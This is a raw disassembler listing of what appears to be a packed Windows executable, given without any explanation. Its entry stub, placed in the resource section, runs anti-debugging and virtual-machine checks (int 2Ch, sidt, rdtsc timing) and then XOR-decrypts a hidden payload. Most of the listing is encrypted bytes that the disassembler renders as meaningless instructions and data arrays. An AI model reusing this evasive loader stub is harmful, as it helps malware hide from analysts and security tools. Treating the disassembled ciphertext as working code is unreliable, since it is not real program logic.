dd 90h, 0B8004000h, 0F04087B0h, 1082888Dh, 41891000h, 24548B01h
dd 0C528B04h, 83E902C6h, 0CA2B05C2h, 33FC4A89h, 0B0B8C3C0h
dd 64F04087h, 58Fh, 0C4830000h, 51535504h, 8D565257h, 104398h
dd 18538B10h, 406AE88Bh, 100068h, 473FF00h, 4B8B006Ah
dd 8BCA0310h, 8BD0FF01h, 338B50F8h, 318538Bh, 0C4B8BF2h
dd 858DCA03h, 1000111Dh, 8F0473FFh, 50006A00h, 0D1FF5657h
dd 8430358h, 538BF88Bh, 8BF08B18h, 0C083FC46h, 89F02B04h
dd 4B8B0856h, 244E8910h, 51144B8Bh, 0FF284E89h, 218589D7h
dd 8B100011h, 4B0359F0h, 80006818h, 6A0000h, 8B11FF57h
dd 5F5A5EC6h, 0FF5D5B59h, 95BE0h, 3F2h dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 39DDh dup(0)
assume ds:_text
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_41903E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419016 proc near ; CODE XREF: .rsrc:0041908D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41901E: ; CODE XREF: sub_419016+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41901E
pop ebx
retn
sub_419016 endp
; ---------------------------------------------------------------------------
db 68h, 27h
; ---------------------------------------------------------------------------
loc_41902F: ; CODE XREF: .rsrc:00419078�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419031: ; CODE XREF: .rsrc:00419046�j
; .rsrc:00419057�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_419065
; =============== S U B R O U T I N E =======================================
sub_41903B proc near ; CODE XREF: .rsrc:0041905A�p
; .rsrc:00419060�p
rdtsc
retn
sub_41903B endp
; ---------------------------------------------------------------------------
loc_41903E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_41904A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_419031
jmp short loc_419059
; ---------------------------------------------------------------------------
loc_41904A: ; CODE XREF: .rsrc:00419040�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_419031
loc_419059: ; CODE XREF: .rsrc:00419048�j
push ebp
call sub_41903B
xchg eax, ecx
call sub_41903B
loc_419065: ; CODE XREF: .rsrc:00419039�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 16738h
sub eax, 100h
jnb short loc_41902F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h] ; CODE XREF: .rsrc:loc_4190F8�j
call sub_419016
and dword ptr [edi], 4 ; CODE XREF: .rsrc:0041910A�j
rcl ebx, cl
mov esi, 0B587FC9Fh
push edx
push ecx
jo short near ptr loc_4190F1+3 ; CODE XREF: .rsrc:004190A1�j
push es
jnb short near ptr loc_41909E+1
adc ah, al
dec esp
fdivrp st(4), st
dec esp
pop ebp
lds ebp, [eax+1Ah]
assume ds:nothing
db 67h
pop ss
das
lock das
sti
fiadd dword ptr [edi-2C4596E1h]
or byte ptr [ecx-6E84F64Dh], 0A3h
adc eax, 4EE35D38h
sub dh, al
or esi, [ebx-6BE2B754h]
xor [ecx], edi
ror byte ptr [ecx], cl
or [eax+65A28A37h], ah
fbstp tbyte ptr [ecx]
popf
add al, 20h
std
cmpsb
inc bl
xor dword ptr [ecx], 0FFFFFFD3h
pop eax
loc_4190E4: ; CODE XREF: .rsrc:00419135�j
cmp [edi+18h], cl
insb
mov ebx, 0E27ABC59h
movsb
db 2Eh
jle short loc_41912F
loc_4190F1: ; CODE XREF: .rsrc:loc_41909E�j
adc ebp, [ecx+187044EDh]
inc edi
loc_4190F8: ; CODE XREF: .rsrc:0041913E�j
loop near ptr loc_419086+5
cli
inc esp
dec esp
ficomp word ptr [edi-31h]
sub esp, [ebp+33h]
out 3Eh, al
test al, 0A5h
db 65h
int 0CFh ; used by BASIC while in interpreter
jz short near ptr loc_419092+1
cmp [esi], bh
mov bl, 0E1h
test eax, 87A3398h
cmp al, 0E5h
lock hlt
; ---------------------------------------------------------------------------
db 0DBh, 0FCh, 0B7h
dd 0C234B74Bh, 519420C2h
db 0B9h, 0F8h, 4Fh
db 8Eh ; CODE XREF: .rsrc:00419187�j
dd 11FB2E3Ah
db 0B6h, 0BEh, 2Eh
; ---------------------------------------------------------------------------
loc_41912F: ; CODE XREF: .rsrc:004190EE�j
db 65h
push 7E592E3Ah
jge short loc_4190E4
xor al, 0B7h
xchg eax, [edi]
mov word ptr [edx], ss
pop ss
jg short loc_4190F8
db 65h ; CODE XREF: .rsrc:004191B8�j
test eax, 0C9CB258Ah
popa
or al, 3Bh
push eax
clc
mov dword ptr [ebp+edx*2+38h], 0AC61ECBBh
or [ebx+73h], dh
pop eax
aas
jp short loc_419170
pop ebx
sub [ecx+35C45F11h], edx
adc cl, [edx-66EBD3B9h]
retn 410Fh
; ---------------------------------------------------------------------------
dw 31A9h
db 8
; ---------------------------------------------------------------------------
loc_41916D: ; CODE XREF: .rsrc:00419178�j
push ebp
inc ebp
; ---------------------------------------------------------------------------
db 0E4h
; ---------------------------------------------------------------------------
loc_419170: ; CODE XREF: .rsrc:00419158�j
outsb
pusha
leave
or al, 58h
db 36h
jl short loc_41919D
jge short loc_41916D
push ebx
pop ss
sbb [esi], edi
jbe short $+2
push edx
loc_419181: ; CODE XREF: .rsrc:0041918E�j
adc [eax-6AE2FFD6h], bh
jecxz short near ptr byte_419127
push esp
and ah, dh
dec edx
dec esp
jmp short loc_419181
; ---------------------------------------------------------------------------
dd 3156EA64h, 8AA76B69h, 0B59EF992h
; ---------------------------------------------------------------------------
xchg eax, ebp
loc_41919D: ; CODE XREF: .rsrc:00419175�j
movsb
shr byte ptr [edi+2CC0AF18h], 58h
sub bh, [esi]
fild dword ptr [esi]
aaa
push ss
fdiv st, st(7)
rcr dword ptr [esi], cl
in eax, dx
mov esi, 0D6D93D51h
lock jge short loc_4191C4
jz short near ptr loc_419140+5
dec ecx
mov dh, 2Fh
xor al, 6Ch
jmp short loc_41923B
; ---------------------------------------------------------------------------
db 8Ch, 0F4h, 3Dh
; ---------------------------------------------------------------------------
loc_4191C4: ; CODE XREF: .rsrc:004191B5�j
cmc
and ecx, [ebx+0EF53B48h] ; CODE XREF: .rsrc:004191DD�j
mov dl, 0
inc ecx
imul ecx, [edi], 0FF39C1CFh
setalc
in al, 28h
lodsd
fdivrp st, st
xor [edx+1Eh], al
jg short near ptr loc_4191C5+1
iret
; ---------------------------------------------------------------------------
dd 45E2F00Dh, 4106AEB0h, 141221ECh, 7425BDB8h, 62B5F8C6h
dd 0EDCFDCEAh, 91DB7ED3h, 218F7BF9h, 3DF1B999h, 0F90E48Dh
dd 30B55BA7h, 7E4CBBD5h, 0E6453B4Dh, 0F0E69765h, 3D544970h
dd 17768675h, 3B3A8CF8h, 0EDE0D36Dh, 488C274Ah, 388E4CB1h
dd 0EBAB736Ah, 38BFF214h
db 6Fh, 0E6h, 32h
; ---------------------------------------------------------------------------
loc_41923B: ; CODE XREF: .rsrc:004191BF�j
test ebp, edi
icebp
into
jge short loc_4192C0
jmp far ptr 0B578h:140ECEE9h
; ---------------------------------------------------------------------------
cmc
lahf
pop es
les ebp, ds:97B502D0h
mov fs, word ptr [esi]
popa
mov word ptr [ecx+32h], es
test al, 0D9h
fld qword ptr [ebp+69h]
imul edi, [esp+edi*4], -6Eh
cli
jmp dword ptr [ebx+48h]
; ---------------------------------------------------------------------------
dd 0BD1A4B8Ah, 1083704Eh, 0D111A8C0h, 0BE34C638h, 8730F8ECh
dd 7EC1585Dh, 25AE7219h, 98367646h, 0C56E0605h, 0BBFD973Eh
dd 0A9D42549h, 2516DEB8h, 59802DD7h, 3ACA38D1h, 0A4CEDEE2h
dd 175AF2C0h, 0A7EB0C04h
; ---------------------------------------------------------------------------
loc_4192A8: ; CODE XREF: .rsrc:004192F2�j
psubw mm7, qword ptr [edi+36h]
sahf
mov al, ds:7C6A9246h
aam 55h
inc edx
sub bh, [edx]
leave
jge short loc_419309
cmp al, cl
; ---------------------------------------------------------------------------
dd 476C962h
; ---------------------------------------------------------------------------
loc_4192C0: ; CODE XREF: .rsrc:0041923F�j
pop edi
movsb
pop eax
db 2Eh
adc al, 54h
and edi, [edx]
xchg ah, [eax+5Ah]
ficomp word ptr [ecx]
add dword ptr [ecx+2Ah], 17h
mov ebx, 0A23A09FDh
outsd
dec esp
nop
xor esi, eax
pop eax
rol byte ptr [edx+eax-35h], cl
fcom dword ptr [eax-10h]
pop es
loc_4192E5: ; CODE XREF: .rsrc:00419304�j
jbe short loc_419337
sbb edi, [edi]
sub al, 5Fh
sub eax, 97C72B14h
adc al, 26h
jno short loc_4192A8
mov bl, 0B5h
adc bl, [ecx+edi*2+47h]
lodsd
push 59h
push ecx
lodsd
setalc
push edx
db 64h
xor edi, ecx
lock jl short loc_4192E5
lahf
stosb
loc_419309: ; CODE XREF: .rsrc:004192B8�j
mov dl, 0EAh
sub [ebp-60F8AE6Ch], ebp
loc_419311: ; CODE XREF: .rsrc:00419324�j
pop esi
test bh, 2Fh
db 3Eh
push ds
dec ebp
mov esp, 0CB6D28C0h
rcl dword ptr [ebp+eax*2+43720DDh], 1
loop loc_419311
pop ebx
mov edi, 99E4FDCCh
add [edi-1C1B4C3Ch], esp
test [edx-5Bh], al
sub al, 0EFh
loc_419337: ; CODE XREF: .rsrc:loc_4192E5�j
sar dword ptr [edx], cl
cmp ebp, [eax]
in al, dx
dec esp
out 2, al ; DMA controller, 8237A-5.
; channel 1 base address
; (also sets current address)
icebp
mov edx, 0E9F13D43h
db 66h
aam 8Ah
push ebx
dec eax
loopne loc_41936A
mov edx, 961E5B92h
push 2825BD00h
or [edi+341EB6B5h], dl
mov ds:5E6BAE47h, al
push 6553D7C2h
inc esi
inc ebp
cwde
hlt
; ---------------------------------------------------------------------------
loc_41936A: ; CODE XREF: .rsrc:0041934A�j
stosb
retn
; ---------------------------------------------------------------------------
dd 2AEFF37Dh, 781110F0h, 0A25D5BA3h, 0DA825830h, 0D73C560Ah
dd 76A5E84Fh, 2C5E0DEh, 6A289123h, 0A8CD9802h, 0B4F5C089h
dd 0E8E31D1Ch, 7810EB26h, 408D809h, 79C82961h, 0E9C3318Eh
dd 11528ABDh, 0A08BB5F2h, 2F1BCD83h, 0BF0098FFh, 1FD0422Fh
dd 8E11DDE4h, 4126D2B9h, 7E66D6E5h, 0D8A626A1h, 975DF594h
dd 20ECEE50h, 50787EDFh, 9809C9A2h, 0DF33358h, 832AC2A1h
dd 87D00351h, 85DC1EB0h, 0C8D8405Ch, 28987AA6h, 0B6F7B30Bh
dd 4533931Eh, 6C159DBDh, 64A53528h, 51C72347h, 93C4B1DDh
dd 96DEEBDBh, 0A2D26E7Dh, 0A4FFEAF5h, 0C13180CBh, 1104D67Bh
dd 8208894h, 6FB0485Eh, 9450B89Bh, 0FC9F1712h, 7237809Fh
dd 0FB88E2E3h, 59087974h, 335CA4E5h, 6BB7EDA1h, 36AE4AC3h
dd 2ABB6378h, 606A88B6h, 0C4C8E8Dh, 0AD69312Dh, 888DCF50h
dd 108A4A89h, 0BCC324F8h, 744F6D3Fh, 0A636CECDh, 0E6A31A38h
dd 66058A99h, 0CF8D0A15h, 32116B6Eh, 1F9664CCh, 0DA931B01h
dd 0B774EC7Dh, 8FE51C19h, 306DA04Dh, 9F14EB68h, 0D2CA08A0h
dd 0C4EEB6ACh, 0C27C7C16h, 0FD21A030h, 5DB58C35h, 0C7BBC4C4h
dd 5FB0DDB5h, 9EB4B4B7h, 9AEA5E22h, 8CE9F431h, 0B8C9BD7Ch
dd 0B8DE7520h, 0E734E53Ah, 1268C53Fh, 8B48992h, 7A292D5Ah
dd 7F5ECA99h, 5BCF177Dh, 3594099h, 0B7C4199Bh, 0A77CBFF7h
dd 0D123BBBEh, 4150DA83h, 2DAF5FE0h, 0B8A46959h, 30803979h
dd 0FBBF8788h, 6E2E4147h, 5BF1F5F6h, 5DAE1DCBh, 99740540h
dd 58C9AA5Ah, 0E1C96BECh, 73DB4358h, 0D594FE6Fh, 746F6DC1h
dd 0A38A120Ah, 0F0DD3028h, 30A94141h, 0DCF54530h, 1337606Fh
dd 1667C423h, 5A1C9097h, 34760EF2h, 0F75F9D9Ch, 2C47CE5h
dd 0E325D4EAh, 0B63F4C4Fh, 0E298B8Bh, 5280AEE1h, 75179CAFh
dd 4F106089h, 0AA0DE7E7h, 0CF3FB2EBh, 0ECE6665h, 0C5FF5339h
dd 0B93D5666h, 0F2C626C5h, 9C842C2Dh, 2B6C2450h, 0BAFB8331h
dd 498B2323h, 0D91AB2B1h, 68AA4241h, 76A8781h, 0B7E2B8F5h
dd 0BB015BEFh, 5D92BFFBh, 69B4E1ECh, 0A075FFDFh, 31FB4F63h
dd 8E47F2D8h, 0C12E29h, 60218F87h, 0E0BA3D1Fh, 4E628F8Eh
dd 0D283FDF9h, 2C816D78h, 0BC62DCDBh, 1CA0565Dh, 9B4EA2B5h
dd 12D61132h, 4D4EA783h, 0E9BC1004h, 40044360h, 0CB9DD9F1h
dd 2DE24D53h, 0A858B3F3h, 0CDF2227h, 9A55A081h, 0C9B91104h
dd 7D2BB2F0h, 0F58DF4E1h, 42177D6Ah, 0B46FCBFBh, 55F34E4Bh
dd 8443CCFEh, 1CE22B39h, 6024B8AEh, 0F6A62F6Ch, 77068F9Ah
dd 0DA9EE5E4h, 72F2767Fh, 0B07FFA9Bh, 0FC94A49h, 8875C8BCh
dd 17942C31h, 6B2E8295h, 0EABB3177h, 48026F40h, 0CE89E1D4h
dd 3FF8474Dh, 0DB5DC7D6h, 2CD82104h, 0A95EBFBBh, 89AE190Bh
dd 5F2E97B6h, 0FC8CEDE8h, 371C7C79h, 8A7CC5D8h, 3AED5440h
dd 8A4EF9DBh, 18D6012Bh, 42469FB8h, 0FB981908h, 41088998h
dd 0D79DEAC4h, 42C27E77h, 8166CFEDh, 4D64943h, 83588DA4h
dd 0EFB53A3Ch, 1011919Ah, 0CBAB123Fh, 681F6A62h, 0F39BFAFFh
dd 0DEB4B44h, 0A878F2B4h, 1BC02010h, 9348B583h, 0EF8B6422h
dd 683EA586h, 0C785EBF1h, 4C1F5511h, 0BB7BC4F6h, 12F75E59h
dd 0A02881C7h, 19EE242Ah, 632AAAB2h, 0FAB00027h, 5104908Fh
dd 0F59AE3E4h, 37E15B1Ch, 0B77DC2FCh, 26D04C54h, 9157B8A3h
dd 0F8B0352Eh, 7E3DAEE9h, 0E18C191Bh, 4C1F6464h, 0DF90DB97h
dd 2FE66B42h, 0A46CD7C7h, 0DE34604h, 995483A4h, 0CDAB2A13h
dd 1B39989Ah, 0C48EF3CCh, 5C177A54h, 0B97AC3ECh, 19FD5C58h
dd 8D598EC0h, 18CB013Eh, 743B85BCh, 0F9A53F6Fh, 55159B9Dh
dd 0DCB3BFBDh, 44F16E6Fh, 0B77BDEFCh, 50D74F59h, 8B5685F9h
dd 0E7915B2Fh, 7B148E8Bh, 0F2E11C16h, 59377D6Ch, 0B441FDF4h
dd 2DF95A5Ch, 0AC7AC3C2h, 0BFC4706h, 925790A2h, 0E4A13603h
dd 6F38819Bh, 0D889D785h, 5E107D52h, 0AE66CAF7h, 3FF76033h
dd 0BF2AB2A7h, 9DB3F3Ch, 7E2C88B7h, 0F19E163Eh, 7168656Ch
dd 0C383FDE6h, 29C6737Fh, 0D575C1C1h, 10CF4C6Ah, 985C8BA9h
dd 0F78B5D39h, 663E88AAh, 0D0B30F08h, 5D1A7D63h, 0B267FDFCh
dd 35F9457Dh, 946FB9D6h, 0ED43B0Bh, 9606BDA3h, 0C0D00D0Bh
dd 7B2DB482h, 0FD8BF2E7h, 591D7967h, 820DD6D7h, 3EEF7640h
dd 0BB49B0A2h, 1FDF3B21h, 720E9091h, 0DAAE3C72h, 5C0B6773h
dd 0D49CC2F5h, 28E6486Bh, 9B6CFEAEh, 0CFE305Fh, 9378B8A8h
dd 0F0A43A0Eh, 14388185h, 0D3AA0932h, 5B33636Eh, 8C04F9F6h
dd 34E4635Eh, 8E51EBD7h, 3C02E2Ah, 6529B58Ch, 0FB9F6906h
dd 710588B8h, 0DA8CE2D4h, 3D11787Fh, 0BF5ED2EBh, 3FFB425Ah
dd 9E4493B0h, 17DC2020h, 642181AEh, 0D4DB0A01h, 4C1E5276h
dd 0C1A9EBE3h, 2AEF5653h, 0B87FDFE6h, 12C82C4Dh, 0F656BFA7h
dd 0F79F1410h, 43329B84h, 0D1920C14h, 563B626Dh, 0BA77F2F6h
dd 3EE17F2Bh, 814DD2EFh, 22D12825h, 6F2AA9ADh, 0D1BD3E0Eh
dd 73088A96h, 0C199FAFCh, 6DD71870h, 0AF7BF4E7h, 2DEA4344h
dd 8242A5C5h, 13CD3326h, 78288E87h, 0F5B31774h, 5E0F616Dh
dd 0CD9EF492h, 3CF84C49h, 0B974CBD2h, 15AA272Dh, 0F74FB2AAh
dd 0E2A7042Ch, 753783EEh, 0A5931A15h, 51036144h, 0B063F0EEh
dd 20F9426Fh, 8D44F5DEh, 72D0212Fh, 6730B293h, 0E5B60518h
dd 62169FBEh, 0D59FE7E6h, 5BE46D7Bh, 0BB71DCF4h, 30E93852h
dd 805DA2B2h, 0DF02333h, 0D0F8880h, 0F9A91B3Ch, 5F086B76h
dd 0D499E4DCh, 8E05677h, 0AD75FAB1h, 0DC53124h, 995F80A4h
dd 0EBA32404h, 5318F18Ah, 0EFB8C129h, 7156223Dh, 9707D3D1h
dd 38D44848h, 0AF43CDD3h, 21B63729h, 730ABABEh, 0F79F020Eh
dd 631BBE83h, 0D697D88Ah, 32E76F48h, 0BC70FFD1h, 27E45C4Dh
dd 8A62C886h, 0AA50B30h, 7B2386B0h, 0DCA63313h, 29878505h
dd 0D3AC5DBFh, 0A28D2523h, 0D938F83Fh, 6CC64428h, 93688380h
dd 0D807E864h, 4C0A267Bh, 0F5B8C1EAh, 0ABECEE5Ch, 450890B2h
dd 0C0673CEAh, 0E5179318h, 0B7BF8BCEh, 0ADC3538Bh, 0A0D55D79h
dd 230EAC04h, 270C85E1h, 41B33753h, 551D6A2Ch, 60A23AA9h
dd 9065A198h, 0AB4A5958h, 0C3DBE88Dh, 9EB7371Dh, 476F1706h
dd 0BC94C497h, 4BEE724Ch, 8A1DDFB3h, 0FF521510h, 0FA0CF85Fh
dd 1C333D3Dh, 196BD83Ch, 0F49E7D04h, 22FA9F9Bh, 0CBEAA1AFh
dd 4699A4A2h, 372BC08Eh, 0A7470319h, 293A5A56h, 1B5B6E5Dh
dd 2465E6C4h, 4C0BD864h, 0D30197E4h, 5F139B86h, 61B8BEB5h
dd 0E7122C9h, 549A5A6h, 1061C569h, 846CF7F5h, 1C980807h
dd 36006869h, 7CA3A2A0h, 0A8DE33B4h, 0F221CB4Fh, 133DD5C8h
dd 75329A7Eh, 0D9033379h, 0A9EB6BD7h, 0B9261311h, 0F810244Dh
dd 0DA530130h, 0D709213Ah, 27ED004Fh, 5719B08Fh, 0B9D6FA91h
dd 21E1FECDh, 796072A9h, 1E852D37h, 8614A869h, 62A43CD3h
dd 1FB296CAh, 81F341EFh, 84DF1583h, 0A0D163F9h, 0FBC5B58h
dd 0BF2A98B3h, 289CECA4h, 0C4D93271h, 4D624776h, 0E7F65312h
dd 8CEA6655h, 0DF00F5DEh, 0AA8685EEh, 498327ECh, 4F1E5CA6h
dd 316B47F2h, 0E92AC2CAh, 7BE182DAh, 0BDC4DDB0h, 97E86A94h
dd 266B4574h, 3C7D8E8Fh, 45861F16h, 1E3E55AEh, 976EB65Dh
dd 0F140AD6Ah, 6831BE1Bh, 1C946829h, 0F136F12Ch, 6522C681h
dd 9350D9F3h, 0C56ED643h, 0E0109425h, 0E4BC8CCBh, 0CF13DE42h
dd 0D184C67h, 1999F11Ch, 0AD0585ECh, 0FF7E429Ch, 0E0FB31CDh
dd 0DF993404h, 2B18CBCBh
dd 0F3A1E311h, 3A661577h, 143B8672h, 0D6C36043h, 7419E559h
dd 4688C84Ah, 574AAFAEh, 55BC49D3h, 0EAB45CDh, 7C66E71h
dd 145DC990h, 0A35DF873h, 0DEF50C0Bh, 0C2039992h, 5097437Eh
dd 74DDBAB9h, 70826660h, 84CC2553h, 8FD16C4Ch, 1F35A7F7h
dd 0AEEE826Fh, 692C4016h, 58F2F2A5h, 5CAD1910h, 7BA10DF7h
dd 7BBC5550h, 921B2B2h, 0F2DB1822h, 696A0202h, 496C6EC3h
dd 0D189110Bh, 8C6C462Ah, 62C0146Fh, 0A137CFCFh, 0A5E3EBA1h
dd 0EA56EEEFh, 94C9A4E8h, 0F3F0540Ch, 0D7E78AEFh, 3840A77Bh
dd 0B572E9BAh, 426B41Ch, 5842EAF5h, 40A4A9ECh, 0EDF507AEh
dd 22EFB7A3h, 692D5340h, 4356E2CCh, 5D9F32A1h, 2D1E6EC5h
dd 8FE4453Fh, 5C1CB44Fh, 0CB8B2324h, 0D3FEFC51h, 38FAA2B9h
dd 48882AE5h, 0FC6D4EB0h, 0AE3CBE48h, 0A438E0E3h, 0AA01F5A0h
dd 0D40AEFDEh, 9B667E7Ah, 72777B07h, 0D1791017h, 4A762D1Ch
dd 0F3242936h, 0A3B74C7Bh, 8691248Ch, 6E5A65AAh, 2E61F9F9h
dd 0B0F0780Dh, 5BE9818h, 4F49B7D2h, 0DA903709h, 0EE2EC627h
dd 89E68D6h, 33CCA314h, 0DB923D25h, 0E4E72671h, 0F5FAD555h
dd 23DAED09h, 8A4CE3B1h, 446BD7BEh, 0C360D1E0h, 384C6EA1h
dd 0FE58F0EFh, 0A6E77FCEh, 6727318Fh, 4009C8D4h, 54962E88h
dd 482D7B3Fh, 0F7BA4070h, 344DC42h, 61A64B57h, 2D58C656h
dd 0B1F1050Fh, 608CB419h, 0ED308888h, 2BC55F19h, 0D383B8B2h
dd 0FFC32277h, 666E1998h, 0ECA80102h, 5C6E7B84h, 0CED3BBAEh
dd 0B5CBE24Bh, 602ABCB2h, 69AB6452h, 6683026h, 0B8E60BF4h
dd 4899C2F0h, 4FB8D0D0h, 36781006h, 0A870F0DAh, 31F64042h
dd 34B341BDh, 0F1B67E61h, 3773A91Ch, 6851E5A5h, 7263CBD7h
dd 0B2F18AE3h, 17D34B9Eh, 48456F9h, 0EDA10915h, 0C02BB85Dh
dd 0B6F30858h, 5D1FB6B3h, 0B212726h, 2D5E2A07h, 43D99112h
dd 7BA6E8B1h, 5BDF4CB3h, 5AB92BCEh, 39C2D2D2h, 8DEF3FE9h
dd 195AF219h, 4568DC81h, 37490C6Dh, 0F74B1D14h, 0E313301Fh
dd 0E6178FF5h, 0F83CB44Dh, 576EE9Ah, 115EC89Eh, 2454CCBFh
dd 83CC1E07h, 0C7801B2Bh, 0D2229A9Dh, 0E9CA38B3h, 0E31C9DAh
dd 0B0ED30CCh, 4C9903E8h, 0F6A9123Ch, 7E336264h, 0D48DEFFEh
dd 1E24746h, 0AE72D8D1h, 0B99E453Dh, 0D6E1B58h, 6B4F36BAh
dd 191B99F1h, 0C3B8D57Bh, 83CF9F09h, 710991BDh, 57993127h
dd 1965C432h, 1047AFB0h, 4B435275h, 95D66E6Eh, 62E8569Bh
dd 50C62789h, 0A12F7AB0h, 0E0862650h, 36A30B0Bh, 0D60CCA0h
dd 0B1EEC3CFh, 352562E9h, 0B824FB71h, 0AA7FC88Dh, 0BEFF9632h
dd 6DE7274Ch, 8B1EB6B4h, 0F9514D2Fh, 0FC0DF975h, 0C13BEFh
dd 86D5E4BDh, 0AADBB3B4h, 9409E9Bh, 2A8BA291h, 5765C231h
dd 0E8439291h, 0C246573Ah, 778D0ECh, 0BA92FA90h, 0D936FECEh
dd 85C5BE3Bh, 8910E21Dh, 8C149C87h, 6C37FCB9h, 0F3329F4Fh
dd 0B9423D5Bh, 1E26B0A7h, 0CC748629h, 0D9713925h, 0C00099D9h
dd 4F5896A5h, 6810B7B7h, 1A225909h, 0FA56C9E7h, 0DACE6667h
dd 317C600Ah, 0FBBA84B5h, 109581EBh, 8880A393h, 0D158300Fh
dd 3929BA92h, 0F29A20D9h, 3DC4F9ABh, 9B752142h, 261081C3h
dd 0C492DCEAh, 0B7651A6Ah, 0FCBB45F4h, 162D1A31h, 73694E8h
dd 8CD90FD7h, 101AE85Ch, 20D7F0A8h, 7FF8F809h, 0FEB71391h
dd 0DB921A19h, 0D794828Eh, 1DB17978h, 0C8F5F354h, 0B5D05857h
dd 2E6FCC43h, 0DC6D8986h, 0F81E9EAh, 8FB82C64h, 0D29D0504h
dd 0DB1C834Eh, 10EC0453h, 0B21B3E1h, 99DA721Ah, 0AD955581h
dd 0B7C984E8h, 6D78B4E0h, 5BE7B09Eh, 65985546h, 0FAC8374Eh
dd 7B3864D9h, 27D36713h, 0C9E54D4Ch, 6475670Bh, 0A39163CAh
dd 0DA941C06h, 0D113FC3Ch, 72538A49h, 288A88h, 0A3ECFC97h
dd 9AE9F8C7h, 0AEDFB7CCh, 3D15C39Dh, 9D3C59F7h, 6CAD83CAh
dd 79D2C5F4h, 7B8D790Dh, 3B7F6168h, 9E527343h, 0E4FEFC26h
dd 33FAA2BAh, 0F2011E73h, 0D72981E4h, 52B315B4h, 63132E45h
dd 85F85069h, 25106266h, 8F4B7E4Dh, 0C994A5CEh, 0DE711816h
dd 3C42D1Bh, 0B375ECE9h, 5DB5D9B5h, 0FE13DBE9h, 0A0F9A7FCh
dd 53443AF8h, 0CACAA2B2h, 52E27979h, 8E35C3C3h, 31FA5F45h
dd 0C31CF5A9h, 50D23A31h, 5F4DD4C9h, 0DE88272Dh, 5F2F584Eh
dd 0D79EE1E0h, 26E46055h, 0B475C0C4h, 3BDE2713h, 814BB49Ch
dd 0F5AC0236h, 7730A3B2h, 0E4831A0Ch, 47126C6Eh, 0A556C2EFh
dd 36FB4F5Eh, 9057D8CFh, 0DC0B17h, 6E25ABBFh, 0FDBC3B06h
dd 7D1B9990h, 0DE90FDDAh, 5BF3787Ch, 0A97FDAF7h, 2C5545Eh
dd 865BB287h, 7D62539h, 7D0F8280h, 0FFB41905h, 44047165h
dd 0F6A0E7FDh, 49F8574Bh, 8D5DFCE2h, 2DF90216h, 9B539F8Ch
dd 0E8B90D12h, 40058589h, 0C98CEE16h, 76246379h, 0A075EDE8h
dd 31C15B43h, 8B4FCDCEh, 0BF31222h, 712AB1ABh, 0C6D41E0Eh
dd 4704899Bh, 0C29DC2FEh, 40801A6Dh, 0D011F9A8h, 2DD13938h
dd 8259B0A8h, 15B43679h, 7E238994h, 0F3B75817h, 626E6963h
dd 9BB6D6DDh, 32FE4E5Bh, 0AD7ED9C4h, 2CFF1148h, 0B34EF383h
dd 0A8852A2Eh, 6A3384D6h, 0ADDAF4F4h, 3679F95Ah, 4755A09Eh
dd 65B8D6C3h, 8AA279BDh, 74B77F58h, 286B4B23h, 7B146D5Ch
dd 493588E4h, 53460095h, 18832B31h, 0A43C9605h, 5E235C13h
dd 0D344D437h, 5330E4D5h, 79DBE8D7h, 0F87A2075h, 23EA8AA3h
dd 33FEA6BEh, 7BA512A1h, 9D944FB3h, 94E3C9B9h, 183D6529h
dd 7679E9ADh, 715BC3DDh, 0A8EA8385h, 0EEFED46h, 2E0991B3h
dd 569931A6h, 0F3814533h, 1FE8507Eh, 0FA49B5DDh, 0A4FA27F8h
dd 197EFCh, 0C2818884h, 428414F3h, 9155F8AAh, 2DEF7F14h
dd 0ECA735C9h, 8BC26A75h, 7A459D28h, 0F708287Ah, 0D18FF7FEh
dd 8DD44E03h, 384FA225h, 34CE49B6h, 6BAE464Fh, 0A47E9380h
dd 0CEE3362Ch, 0E55CB8BEh, 99C79E17h, 0C13AFB11h, 7D875D5Fh
dd 57AA1ECFh, 0E728C5D7h, 0E346074Fh, 678CCFFh, 95D76286h
dd 7722A2FDh, 0E6B0DBC4h, 17C0414Fh, 2C42ACE8h, 528FD5AEh
dd 0F23423CAh, 0C99F5B5Ah, 4206B9A6h, 351E2F79h, 2F4122E1h
dd 0EE5151A4h, 24C12B4Dh, 0DE1FDFB7h, 92F90746h, 0CD152740h
dd 7336E565h, 910DD680h, 9BC07B11h, 0A1F19913h, 0A00B9385h
dd 43F36132h, 0B82AC2C1h, 0D2FAD01h, 0F749D1CCh, 0A7F3BDE5h
dd 276C17FFh, 0E5A38E8Fh, 77B54C5Bh, 9959E983h, 2530C23Dh
dd 1C34FCE0h, 83C45C56h, 6123989Ch, 0C4961412h, 0CE220A4Bh
dd 0F12A400Ch, 0B514A029h, 0EF208893h, 3D3DC579h, 763FE7CEh
dd 0BEE390E2h, 8BA1A7F6h, 0ADDDA9C7h, 3C797D86h, 7981A4A4h
dd 5BAC2D6Bh, 36964E9Ah, 92BB637Fh, 0F5B5101Eh, 3D5CB614h
dd 28693121h, 115D13C0h, 4688103Fh, 0F6733A23h, 31F73F0Eh
dd 0F55CCFA7h, 84C4360Fh, 81AA6DECh, 0A3D4509Dh, 472ECC8Eh
dd 558E16B8h, 3931B0Ah, 54AFBCD3h, 70826AEDh, 50118F8Ch
dd 1A2F3A39h, 1F6FDB12h, 737B79DFh, 0FB7E263Ah, 0FD235B20h
dd 32753535h, 13D33B36h, 4BAE29D9h, 47CE24E3h, 0CCDA4266h
dd 0C1595D56h, 470663C8h, 52C5A4E7h, 834EB09Fh, 2C407460h
dd 31C8303Ch, 0B5D213DBh, 4A2EB8EDh, 56DE9549h, 0B6B2F2F3h
dd 0C33489D7h, 6E2497Dh, 67AE7289h, 71837B05h, 50138B88h
